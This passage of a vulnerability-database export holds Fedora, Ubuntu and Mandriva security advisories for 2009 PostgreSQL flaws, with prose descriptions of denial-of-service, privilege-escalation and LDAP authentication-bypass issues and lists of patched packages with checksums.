{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0922"], "description": "PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs (including transactions, subselects and user-defined types and functions). The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DBMS server. These PostgreSQL client programs are programs that directly manipulate the internal structure of PostgreSQL databases on a PostgreSQL server. These client programs can be located on the same machine with the PostgreSQL server, or may be on a remote machine which accesses a PostgreSQL server over a network connection. This package contains the docs in HTML for the whole package, as well as command-line utilities for managing PostgreSQL databases on a PostgreSQL server. If you want to manipulate a PostgreSQL database on a remote PostgreSQL server, you need this package. You also need to install this package if you're installing the postgresql-server package. ", "modified": "2009-03-23T16:00:42", "published": "2009-03-23T16:00:42", "id": "FEDORA:B5ECF208609", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: postgresql-8.3.7-1.fc10", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0922"], "description": "PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs (including transactions, subselects and user-defined types and functions). The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DBMS server. These PostgreSQL client programs are programs that directly manipulate the internal structure of PostgreSQL databases on a PostgreSQL server. These client programs can be located on the same machine with the PostgreSQL server, or may be on a remote machine which accesses a PostgreSQL server over a network connection. This package contains the docs in HTML for the whole package, as well as command-line utilities for managing PostgreSQL databases on a PostgreSQL server. If you want to manipulate a PostgreSQL database on a remote PostgreSQL server, you need this package. You also need to install this package if you're installing the postgresql-server package. ", "modified": "2009-03-23T15:55:47", "published": "2009-03-23T15:55:47", "id": "FEDORA:3918B208514", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: postgresql-8.3.7-1.fc9", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T01:42:12", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0922"], "description": "It was discovered that PostgreSQL did not properly handle encoding \nconversion failures. An attacker could exploit this by sending specially \ncrafted requests to PostgreSQL, leading to a denial of service.", "edition": 5, "modified": "2009-04-07T00:00:00", "published": "2009-04-07T00:00:00", "id": "USN-753-1", "href": "https://ubuntu.com/security/notices/USN-753-1", "title": "PostgreSQL vulnerability", "type": "ubuntu", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-07-09T00:23:17", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6600", "CVE-2009-3231", "CVE-2009-3230", "CVE-2009-3229"], "description": "It was discovered that PostgreSQL could be made to unload and reload an \nalready loaded module by using the LOAD command. A remote authenticated \nattacker could exploit this to cause a denial of service. This issue did \nnot affect Ubuntu 6.06 LTS. (CVE-2009-3229)\n\nDue to an incomplete fix for CVE-2007-6600, RESET ROLE and RESET SESSION \nAUTHORIZATION operations were allowed inside security-definer functions. A \nremote authenticated attacker could exploit this to escalate privileges \nwithin PostgreSQL. (CVE-2009-3230)\n\nIt was discovered that PostgreSQL did not properly perform LDAP \nauthentication under certain circumstances. When configured to use LDAP \nwith anonymous binds, a remote attacker could bypass authentication by \nsupplying an empty password. This issue did not affect Ubuntu 6.06 LTS. \n(CVE-2009-3231)", "edition": 5, "modified": "2009-09-21T00:00:00", "published": "2009-09-21T00:00:00", "id": "USN-834-1", "href": "https://ubuntu.com/security/notices/USN-834-1", "title": "PostgreSQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "cvelist": ["CVE-2009-0922"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:079\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : postgresql\r\n Date : March 23, 2009\r\n Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n PostgreSQL before 8.3.7, 8.2.13, 8.1.17, 8.0.21, and 7.4.25 allows\r\n remote authenticated users to cause a denial of service &#40;stack\r\n consumption and crash&#41; by triggering a failure in the conversion of a\r\n localized error message to a client-specified encoding, as demonstrated\r\n using mismatched encoding conversion requests &#40;CVE-2009-0922&#41;.\r\n \r\n This update provides a fix for this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0922\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n f9241cf6d715a379d5c520e5afdf45aa 2008.0/i586/libecpg5-8.2.13-0.1mdv2008.0.i586.rpm\r\n 698700d43313466b8834c20010680d3e 2008.0/i586/libecpg-devel-8.2.13-0.1mdv2008.0.i586.rpm\r\n 514724bf629defb3d1e57e459af4acd8 2008.0/i586/libpq5-8.2.13-0.1mdv2008.0.i586.rpm\r\n 1c92d4ba0dc05014133fe6da1a508d5e 2008.0/i586/libpq-devel-8.2.13-0.1mdv2008.0.i586.rpm\r\n 07a35a7ecbafbc776f9137d0057ec0b1 2008.0/i586/postgresql-8.2.13-0.1mdv2008.0.i586.rpm\r\n e42c40c145452f818eac7960b84af6b3 2008.0/i586/postgresql8.2-8.2.13-0.1mdv2008.0.i586.rpm\r\n e04f853f37d38bac46998df0aee2bd34 2008.0/i586/postgresql8.2-contrib-8.2.13-0.1mdv2008.0.i586.rpm\r\n 770c2b9d188efdd36d006bfc25a7ad0e 2008.0/i586/postgresql8.2-devel-8.2.13-0.1mdv2008.0.i586.rpm\r\n 6cb2fa108571388f215047595e3aafb3 2008.0/i586/postgresql8.2-docs-8.2.13-0.1mdv2008.0.i586.rpm\r\n 6f7eb8e0e417ca69b37054bfc0dfc08c 2008.0/i586/postgresql8.2-pl-8.2.13-0.1mdv2008.0.i586.rpm\r\n a3dc79ade344faddc9d903cee90bddba 2008.0/i586/postgresql8.2-plperl-8.2.13-0.1mdv2008.0.i586.rpm\r\n ce7b3f368bfbacaf9698e3763aabfb45 2008.0/i586/postgresql8.2-plpgsql-8.2.13-0.1mdv2008.0.i586.rpm\r\n cb93f587ebbeb93cab1957dcf6991cd6 2008.0/i586/postgresql8.2-plpython-8.2.13-0.1mdv2008.0.i586.rpm\r\n 38259a1a5cb24bee618041eafd7fa141 2008.0/i586/postgresql8.2-pltcl-8.2.13-0.1mdv2008.0.i586.rpm\r\n a7058ee55a07ff089cce1c3eed39779a 2008.0/i586/postgresql8.2-server-8.2.13-0.1mdv2008.0.i586.rpm\r\n c4ea4b4bb74611054f5f6dfd3553289d 2008.0/i586/postgresql8.2-test-8.2.13-0.1mdv2008.0.i586.rpm\r\n e0df1220414d4e624f43a72aed69f409 2008.0/i586/postgresql-devel-8.2.13-0.1mdv2008.0.i586.rpm \r\n 3491251a5752e2a257f3ff4f3e47414e 2008.0/SRPMS/postgresql8.2-8.2.13-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n 163d7b2bd2eaffacce8d61b7ace362b2 2008.0/x86_64/lib64ecpg5-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 103e65f4617c283bbade0148f0e26acc 2008.0/x86_64/lib64ecpg-devel-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n d03e4fc7f192ce2d78537c89866a9f18 2008.0/x86_64/lib64pq5-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 7abb130f1b71bfd2cb202fb29a08ae9f 2008.0/x86_64/lib64pq-devel-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 710627dcad75bc2ffb9669015d238f8c 2008.0/x86_64/postgresql-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n af50c8cbca8efddd76cc746303100694 2008.0/x86_64/postgresql8.2-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 4cf0e9e87aafd9b3a0fcb90afcc411d9 2008.0/x86_64/postgresql8.2-contrib-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 1078faf060ca6948bea10f09c9adaaa5 2008.0/x86_64/postgresql8.2-devel-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 9ef73f2949a625aba74152c9fff1de06 2008.0/x86_64/postgresql8.2-docs-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 59c544d4ccf48a1056b6ecd3ac44b2bf 2008.0/x86_64/postgresql8.2-pl-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 0c482c25d40a13372951c50019905441 2008.0/x86_64/postgresql8.2-plperl-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 18b152e8371013ffda040326c714637d 2008.0/x86_64/postgresql8.2-plpgsql-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n d4b175c101c3e550f597162a42f884d2 2008.0/x86_64/postgresql8.2-plpython-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 94fcefc2c252b9720b0c8b8ac062f81d 2008.0/x86_64/postgresql8.2-pltcl-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 97f3d334037bccf4f2d303b417c34a88 2008.0/x86_64/postgresql8.2-server-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n 9eb3dd7efb4467036abb937dd629e627 2008.0/x86_64/postgresql8.2-test-8.2.13-0.1mdv2008.0.x86_64.rpm\r\n a509eb9944cc137b1c82c4494cb8d3dc 2008.0/x86_64/postgresql-devel-8.2.13-0.1mdv2008.0.x86_64.rpm \r\n 3491251a5752e2a257f3ff4f3e47414e 2008.0/SRPMS/postgresql8.2-8.2.13-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.1:\r\n b4ace5df917bced86e8010c706955d02 2008.1/i586/libecpg8.3_6-8.3.7-0.1mdv2008.1.i586.rpm\r\n 1bba75ab697d6cde761c66b9b958dcff 2008.1/i586/libpq8.3_5-8.3.7-0.1mdv2008.1.i586.rpm\r\n 3d2f038d6ccd9e614af863440af78f03 2008.1/i586/postgresql8.3-8.3.7-0.1mdv2008.1.i586.rpm\r\n 7774ef3af2fee7f85e3e42b8abb9e492 2008.1/i586/postgresql8.3-contrib-8.3.7-0.1mdv2008.1.i586.rpm\r\n 5c6856d88e47e20120ecf4a906ea7d3c 2008.1/i586/postgresql8.3-devel-8.3.7-0.1mdv2008.1.i586.rpm\r\n 3cde44bf1205c53363cf30526ffd40aa 2008.1/i586/postgresql8.3-docs-8.3.7-0.1mdv2008.1.i586.rpm\r\n a2924ef3378c3dd35967ce50f3732b9b 2008.1/i586/postgresql8.3-pl-8.3.7-0.1mdv2008.1.i586.rpm\r\n b44d7859fa114601878e8569be7ac3f7 2008.1/i586/postgresql8.3-plperl-8.3.7-0.1mdv2008.1.i586.rpm\r\n a24c46146f2a1f239bd4b339df35d1fc 2008.1/i586/postgresql8.3-plpgsql-8.3.7-0.1mdv2008.1.i586.rpm\r\n 1a28fc5e1b324268ef725226312b2d74 2008.1/i586/postgresql8.3-plpython-8.3.7-0.1mdv2008.1.i586.rpm\r\n 14e25f140c306ff551801f8fb19ddfdb 2008.1/i586/postgresql8.3-pltcl-8.3.7-0.1mdv2008.1.i586.rpm\r\n 5505b6012ea4594acd65eb188c51e2b8 2008.1/i586/postgresql8.3-server-8.3.7-0.1mdv2008.1.i586.rpm \r\n 1a006f4d87239e7466846ba520786a72 2008.1/SRPMS/postgresql8.3-8.3.7-0.1mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2008.1/X86_64:\r\n d005b41fb6618817ee3a0daf275b0732 2008.1/x86_64/lib64ecpg8.3_6-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n ae3ae95a049f6dec0be0fe3e3569cf4e 2008.1/x86_64/lib64pq8.3_5-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n 3f42ac03c9e5bb94d3926bbbe6e60f89 2008.1/x86_64/postgresql8.3-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n c86bea485a7965933b50c958122062d9 2008.1/x86_64/postgresql8.3-contrib-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n a0de60815745385fc2736332f072c222 2008.1/x86_64/postgresql8.3-devel-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n 7ffa43b395465a3704284c81e8fc8035 2008.1/x86_64/postgresql8.3-docs-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n f3a3cc81e2dcfebcfbc454ba38cb0555 2008.1/x86_64/postgresql8.3-pl-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n b4e46582ceacdcf30b908fd48d8f106a 2008.1/x86_64/postgresql8.3-plperl-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n f367c2a68ffb8584cc10b0d372f37513 2008.1/x86_64/postgresql8.3-plpgsql-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n 2684a70b2a7537dce948091d5eae8015 2008.1/x86_64/postgresql8.3-plpython-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n 970e2f95376916110f77d6b575d424a8 2008.1/x86_64/postgresql8.3-pltcl-8.3.7-0.1mdv2008.1.x86_64.rpm\r\n f267902e0d30fd0de7a7c4d66b486565 2008.1/x86_64/postgresql8.3-server-8.3.7-0.1mdv2008.1.x86_64.rpm \r\n 1a006f4d87239e7466846ba520786a72 2008.1/SRPMS/postgresql8.3-8.3.7-0.1mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n 2dc1ff87c5f2e0e712f3e33e7d1fbf7f 2009.0/i586/libecpg8.3_6-8.3.7-0.1mdv2009.0.i586.rpm\r\n 6ce2ab3fa28f4bab5122f7b8d6c7dc55 2009.0/i586/libpq8.3_5-8.3.7-0.1mdv2009.0.i586.rpm\r\n 588ed8f87ed14196f7a03678e87c6241 2009.0/i586/postgresql8.3-8.3.7-0.1mdv2009.0.i586.rpm\r\n e42ecd1aab259c29cb00c09d56c50dec 2009.0/i586/postgresql8.3-contrib-8.3.7-0.1mdv2009.0.i586.rpm\r\n 58676b5091cae76ae072426015872d31 2009.0/i586/postgresql8.3-devel-8.3.7-0.1mdv2009.0.i586.rpm\r\n 783a876cee7991bd017db461919f6622 2009.0/i586/postgresql8.3-docs-8.3.7-0.1mdv2009.0.i586.rpm\r\n fbc9d270f9a82173eb684cc0f7bc0a46 2009.0/i586/postgresql8.3-pl-8.3.7-0.1mdv2009.0.i586.rpm\r\n 5af350b69adde8b4ec52c43df665bd53 2009.0/i586/postgresql8.3-plperl-8.3.7-0.1mdv2009.0.i586.rpm\r\n 05cf119979eaae4f0451e3f4b8406c49 2009.0/i586/postgresql8.3-plpgsql-8.3.7-0.1mdv2009.0.i586.rpm\r\n 4a4779151c3fb39250f26c88b770b8b9 2009.0/i586/postgresql8.3-plpython-8.3.7-0.1mdv2009.0.i586.rpm\r\n 21383e56b4d06e6c6720b03c224d02ee 2009.0/i586/postgresql8.3-pltcl-8.3.7-0.1mdv2009.0.i586.rpm\r\n 22b58d853c33d618fcc3d7b8ce72849d 2009.0/i586/postgresql8.3-server-8.3.7-0.1mdv2009.0.i586.rpm \r\n eee4e760ae148f51a5fe47a3ee0ef84e 2009.0/SRPMS/postgresql8.3-8.3.7-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 0da6a97dec8d4919f37ec088697b8e72 2009.0/x86_64/lib64ecpg8.3_6-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n e587ae3eeea75cd05479fe4ed0d878ac 2009.0/x86_64/lib64pq8.3_5-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n 21c525db24c208c2175242af30d1fc04 2009.0/x86_64/postgresql8.3-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n f25ea1564ee4092927ba0373d16605da 2009.0/x86_64/postgresql8.3-contrib-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n 26c3406868b3ad02d2a27d05e0e99851 2009.0/x86_64/postgresql8.3-devel-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n 5eecc95e44fd0efb16dab3b301c470eb 2009.0/x86_64/postgresql8.3-docs-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n 4780dae1b7ab936c8a4614b1b71b8aa9 2009.0/x86_64/postgresql8.3-pl-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n 3b561b32b5ad9a0399cf66c17cd08335 2009.0/x86_64/postgresql8.3-plperl-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n f9c0a3e906980ba763a47e3957710c1c 2009.0/x86_64/postgresql8.3-plpgsql-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n f99c125df642272051559dcd641a7ffd 2009.0/x86_64/postgresql8.3-plpython-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n 6ce4aecbe1830aede5399b3f4411e8cd 2009.0/x86_64/postgresql8.3-pltcl-8.3.7-0.1mdv2009.0.x86_64.rpm\r\n 7bffb816832003542de9083f0e42961b 2009.0/x86_64/postgresql8.3-server-8.3.7-0.1mdv2009.0.x86_64.rpm \r\n eee4e760ae148f51a5fe47a3ee0ef84e 2009.0/SRPMS/postgresql8.3-8.3.7-0.1mdv2009.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 100faa1ce913b0a0761c2220dc1c9a83 corporate/3.0/i586/libecpg3-7.4.25-0.1.C30mdk.i586.rpm\r\n 251dbb3c55fa0b371c66dc73970af832 corporate/3.0/i586/libecpg3-devel-7.4.25-0.1.C30mdk.i586.rpm\r\n 603d458b24f959ca8e16f20bf9909767 corporate/3.0/i586/libpgtcl2-7.4.25-0.1.C30mdk.i586.rpm\r\n 82a5770bfeba705d871c0f80e3135c64 corporate/3.0/i586/libpgtcl2-devel-7.4.25-0.1.C30mdk.i586.rpm\r\n 9e59101f1c36dbad6f8857ff8f5f23fe corporate/3.0/i586/libpq3-7.4.25-0.1.C30mdk.i586.rpm\r\n 2c6c2b89baac3e84d25ffde8136475a9 corporate/3.0/i586/libpq3-devel-7.4.25-0.1.C30mdk.i586.rpm\r\n 289cb466e3d86438f756f8efa9333b88 corporate/3.0/i586/postgresql-7.4.25-0.1.C30mdk.i586.rpm\r\n 0b79d12e33e75e51c04a04d42340f979 corporate/3.0/i586/postgresql-contrib-7.4.25-0.1.C30mdk.i586.rpm\r\n bc1e242ae9065bc43261c80699a18058 corporate/3.0/i586/postgresql-devel-7.4.25-0.1.C30mdk.i586.rpm\r\n d0967e02415da7e6e68fd65de14e157f corporate/3.0/i586/postgresql-docs-7.4.25-0.1.C30mdk.i586.rpm\r\n 553f932c0d1b765310b4c21185597b28 corporate/3.0/i586/postgresql-jdbc-7.4.25-0.1.C30mdk.i586.rpm\r\n a5bbe2415bdd9feda57aed81d3dc8f8e corporate/3.0/i586/postgresql-pl-7.4.25-0.1.C30mdk.i586.rpm\r\n cf7577af9d9f2157d696922c2b64b8c0 corporate/3.0/i586/postgresql-server-7.4.25-0.1.C30mdk.i586.rpm\r\n b1744dc3200b3e9ce5d019828e02bd62 corporate/3.0/i586/postgresql-tcl-7.4.25-0.1.C30mdk.i586.rpm\r\n 28f7aa3e0ffa9eafb49a7c153ebe668b corporate/3.0/i586/postgresql-test-7.4.25-0.1.C30mdk.i586.rpm \r\n fa32d9d961727dfd678b0f174c04c541 corporate/3.0/SRPMS/postgresql-7.4.25-0.1.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n d8f7cb925ebc259a5f41618d3ac62ca2 corporate/3.0/x86_64/lib64ecpg3-7.4.25-0.1.C30mdk.x86_64.rpm\r\n a07fb7c178935e1f0d4d5025805f19c6 corporate/3.0/x86_64/lib64ecpg3-devel-7.4.25-0.1.C30mdk.x86_64.rpm\r\n d17526d6970f5102ee3cab1a55a9ac87 corporate/3.0/x86_64/lib64pgtcl2-7.4.25-0.1.C30mdk.x86_64.rpm\r\n be1f4d662e0582be3751f24211e395bc corporate/3.0/x86_64/lib64pgtcl2-devel-7.4.25-0.1.C30mdk.x86_64.rpm\r\n ed73566c432517e41024a7697a188d4d corporate/3.0/x86_64/lib64pq3-7.4.25-0.1.C30mdk.x86_64.rpm\r\n 3804492c561d8506847fe932777b1507 corporate/3.0/x86_64/lib64pq3-devel-7.4.25-0.1.C30mdk.x86_64.rpm\r\n 3f7dbfe3376d8042269e272645c77852 corporate/3.0/x86_64/postgresql-7.4.25-0.1.C30mdk.x86_64.rpm\r\n c576842f17ae814b296d32c04a0d0cc3 corporate/3.0/x86_64/postgresql-contrib-7.4.25-0.1.C30mdk.x86_64.rpm\r\n cc6855f1630d11f4f3ebf051dd71f863 corporate/3.0/x86_64/postgresql-devel-7.4.25-0.1.C30mdk.x86_64.rpm\r\n 2da6391a82ca3897a4b4e98d63910ede corporate/3.0/x86_64/postgresql-docs-7.4.25-0.1.C30mdk.x86_64.rpm\r\n 9a70acc9ae22a61cbaf874dd9516146a corporate/3.0/x86_64/postgresql-jdbc-7.4.25-0.1.C30mdk.x86_64.rpm\r\n c8766531be942985c8e185249d10157d corporate/3.0/x86_64/postgresql-pl-7.4.25-0.1.C30mdk.x86_64.rpm\r\n 6234b2a2493fd2dfa8216b8a650bdd39 corporate/3.0/x86_64/postgresql-server-7.4.25-0.1.C30mdk.x86_64.rpm\r\n 45e809777900505af32a4cbab0de0f4e corporate/3.0/x86_64/postgresql-tcl-7.4.25-0.1.C30mdk.x86_64.rpm\r\n 5f501dd445c6c97b57a241e7e8311de7 corporate/3.0/x86_64/postgresql-test-7.4.25-0.1.C30mdk.x86_64.rpm \r\n fa32d9d961727dfd678b0f174c04c541 corporate/3.0/SRPMS/postgresql-7.4.25-0.1.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n b4bf4635ae7be7e2714923e24daf8974 corporate/4.0/i586/libecpg5-8.1.17-0.1.20060mlcs4.i586.rpm\r\n b5d0cdf5990289a8a4e4f6bb59b84173 corporate/4.0/i586/libecpg5-devel-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 5218efd9c8c385c055fe74d3fb68f630 corporate/4.0/i586/libpq4-8.1.17-0.1.20060mlcs4.i586.rpm\r\n ebf494f61329ef4c2141c1525a419786 corporate/4.0/i586/libpq4-devel-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 15752044e1feffb04e78f3ee2337bdb7 corporate/4.0/i586/postgresql-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 08a29597070fb244a883b1897b37f6b2 corporate/4.0/i586/postgresql-contrib-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 1743c91f9a18b048838420762cd6b158 corporate/4.0/i586/postgresql-devel-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 0bec6c29b6d124f51e01501b644e062b corporate/4.0/i586/postgresql-docs-8.1.17-0.1.20060mlcs4.i586.rpm\r\n cfb1a60dd819720e8f1d51e9fad5aeb1 corporate/4.0/i586/postgresql-pl-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 748083ff89734ad5f9aefae6c869cb53 corporate/4.0/i586/postgresql-plperl-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 10323fe939dbc85701dc0243bc04d63c corporate/4.0/i586/postgresql-plpgsql-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 5cbf278534502723209a33f0365fddae corporate/4.0/i586/postgresql-plpython-8.1.17-0.1.20060mlcs4.i586.rpm\r\n f01b61428467fd94f258a1b237153742 corporate/4.0/i586/postgresql-pltcl-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 1836dfcbd3386893b5fc220ec6deb07c corporate/4.0/i586/postgresql-server-8.1.17-0.1.20060mlcs4.i586.rpm\r\n 4ba81a40fa041c85d988a5c1b01c25ff corporate/4.0/i586/postgresql-test-8.1.17-0.1.20060mlcs4.i586.rpm \r\n d4fab9213a6c812244af7bf929cd87ff corporate/4.0/SRPMS/postgresql-8.1.17-0.1.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n d00d613007fd2eedd5472a41caa8e278 corporate/4.0/x86_64/lib64ecpg5-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n 643494df4c242ff99ebda37b7c024c2f corporate/4.0/x86_64/lib64ecpg5-devel-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n 4bb76b447dc908d08e7780fa825c2705 corporate/4.0/x86_64/lib64pq4-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n fb543e123e731625300e180d3bfc17a1 corporate/4.0/x86_64/lib64pq4-devel-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n a851702082555467a1671f03f0c38225 corporate/4.0/x86_64/postgresql-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n f134328fc9781abbbecf02a3e6f4cde7 corporate/4.0/x86_64/postgresql-contrib-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n 6f101503f7e3ffa1a29dd32a4e2c0263 corporate/4.0/x86_64/postgresql-devel-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n 4d6276b145d25a442100b9c81032f00f corporate/4.0/x86_64/postgresql-docs-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n 5bf158e5372e6887a35b0bc39c072e62 corporate/4.0/x86_64/postgresql-pl-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n 105ef26c393c65cc61a426a02829cff7 corporate/4.0/x86_64/postgresql-plperl-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n 0f03a2fd664a3bf865812fe7764a7c49 corporate/4.0/x86_64/postgresql-plpgsql-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n f34c9930e7312eff4db8970ad208bac9 corporate/4.0/x86_64/postgresql-plpython-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n d12288bcefeb72967543859a427dd014 corporate/4.0/x86_64/postgresql-pltcl-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n c629c33eba80da92758e197994d19372 corporate/4.0/x86_64/postgresql-server-8.1.17-0.1.20060mlcs4.x86_64.rpm\r\n 0084b7f53769c965fcc853473e3ce451 corporate/4.0/x86_64/postgresql-test-8.1.17-0.1.20060mlcs4.x86_64.rpm \r\n d4fab9213a6c812244af7bf929cd87ff corporate/4.0/SRPMS/postgresql-8.1.17-0.1.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFJx58LmqjQ0CJFipgRAgVuAKCcWt7x6TUx68zrZiHWV0Ezp/iP0QCdH+6d\r\n798O5je+3No7wIOiVrOUA4s=\r\n=uKpP\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-03-24T00:00:00", "published": "2009-03-24T00:00:00", "id": "SECURITYVULNS:DOC:21510", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21510", "title": "[ MDVSA-2009:079 ] postgresql", "type": "securityvulns", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0922"], "description": "Stack overflow on error message conversion.", "edition": 1, "modified": "2009-03-24T00:00:00", "published": "2009-03-24T00:00:00", "id": "SECURITYVULNS:VULN:9765", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9765", "title": "PostgreSQL DoS", "type": "securityvulns", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-6600", "CVE-2009-3231", "CVE-2009-3230", "CVE-2009-3229"], "description": "===========================================================\r\nUbuntu Security Notice USN-834-1 September 21, 2009\r\npostgresql-8.1, postgresql-8.3 vulnerabilities\r\nCVE-2009-3229, CVE-2009-3230, CVE-2009-3231\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 8.10\r\nUbuntu 9.04\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n postgresql-8.1 8.1.18-0ubuntu0.6.06\r\n\r\nUbuntu 8.04 LTS:\r\n postgresql-8.3 8.3.8-0ubuntu8.04\r\n\r\nUbuntu 8.10:\r\n postgresql-8.3 8.3.8-0ubuntu8.10\r\n\r\nUbuntu 9.04:\r\n postgresql-8.3 8.3.8-0ubuntu9.04\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that PostgreSQL could be made to unload and reload an\r\nalready loaded 